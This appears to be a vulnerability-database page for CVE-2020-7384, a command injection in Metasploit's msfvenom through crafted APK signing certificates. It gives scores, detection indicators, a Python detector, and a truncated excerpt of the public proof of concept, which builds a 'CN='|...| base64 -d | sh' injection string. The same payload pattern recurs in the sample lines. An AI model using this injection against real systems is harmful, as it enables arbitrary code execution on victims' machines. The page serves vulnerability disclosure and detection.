CVE-2020-7384
Published 2020-10-29
Priority P258 · high · 7.8 (CVSS 3.1)
Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 30.56% (98.0th percentile)
Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim's machine.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rapid7 | metasploit | < 4.19.0 | 4.19.0 |
| rapid7 | metasploit | >= unspecified < 4.19.0 | 4.19.0 |
Detection & IOCs (extracted from sources)
Command: msfvenom -x <apk_file> -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null
- Detect msfvenom invocations that supply a crafted APK as a template via the -x flag, particularly when the APK's certificate DN contains shell metacharacters such as a pipe '|' or backtick.
- Inspect APK certificate Distinguished Names (DN) for command injection patterns, specifically a CN field beginning with a single quote followed by a pipe character (CN='|...), which is the injection vector used by this exploit.
- Monitor for keytool and jarsigner processes spawned with a -dname argument containing shell special characters (|, $, #), as these are used to embed the malicious payload into the APK signing certificate.
- Alert on child processes (e.g., sh, bash) spawned by msfvenom or Ruby processes when processing APK template files, which would indicate successful command injection exploitation.
- Look for base64-encoded payloads piped to 'base64 -d | sh' in process command-line arguments, which is the obfuscation technique used to bypass keytool's character restrictions.
- The exploit affects Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 specifically; the -x template flag is the attack surface, so defenders should note this only triggers when msfvenom processes an externally supplied APK template.
- The injection is embedded in the APK's JAR signing certificate DN field, meaning static file scanning of the APK payload itself (not the certificate metadata) will not detect the malicious content; certificate inspection is required.
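An added example (not taken from the page's sources) that applies the DN and -dname checks listed above to certificate DN strings and to keytool/jarsigner process command lines. The function names and sample lines are constructed for illustration, and the DN is assumed to have already been read from the APK's signing certificate.

```python
import re
import shlex

# Shell metacharacters the page names for certificate DNs and -dname values.
SHELL_META = set("|`$#")
QUOTE_PIPE_CN = re.compile(r"CN\s*=\s*'\s*\|")
PIPE_TO_SHELL = re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh\b")


def dn_findings(dn):
    """Return the reasons a certificate DN looks like a command injection attempt."""
    findings = []
    if QUOTE_PIPE_CN.search(dn):
        findings.append("cn-quote-pipe")
    if PIPE_TO_SHELL.search(dn):
        findings.append("base64-to-shell")
    meta = sorted(SHELL_META & set(dn))
    if meta:
        findings.append("shell-metachar:" + "".join(meta))
    return findings


def cmdline_findings(cmdline):
    """Check a keytool/jarsigner process command line for a suspicious -dname."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        # Unbalanced quotes in a logged command line are worth a look on their own.
        return ["unparseable-quoting"]
    if not argv or argv[0].rsplit("/", 1)[-1] not in ("keytool", "jarsigner"):
        return []
    for flag, value in zip(argv, argv[1:]):
        if flag == "-dname":
            return dn_findings(value)
    return []


# Constructed sample process command lines (not real telemetry).
SAMPLES = [
    'keytool -genkey -keystore k.jks -dname "CN=Android Debug, O=Android, C=US"',
    "keytool -genkey -keystore k.jks -dname \"CN='|echo QUJD | base64 -d | sh #\"",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(cmdline_findings(line), line)
```

A leading '#' is legal in an RFC 4514 hex-encoded attribute value, so a lone shell-metachar finding deserves lower confidence than cn-quote-pipe or base64-to-shell.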
CVSS provenance
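| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |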
No detection rules found.
Exploit-DB
Metasploit Framework 6.0.11 - msfvenom APK template command injection
exploitdb·2021-01-28·CVSS 7.0
CVE-2020-7384 [HIGH] Metasploit Framework 6.0.11 - msfvenom APK template command injection
---
```python
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode
# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'
# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()
t
```
Metasploit
Rapid7 Metasploit Framework msfvenom APK Template Command Injection
metasploit
This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework -x
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Classic / Legac
- http://packetstormsecurity.com/files/160004/Rapid7-Metasploit-Framework-msfvenom-APK-Template-Command-Injection.html
- http://packetstormsecurity.com/files/161200/Metasploit-Framework-6.0.11-Command-Injection.html
- https://github.com/rapid7/metasploit-framework/pull/14288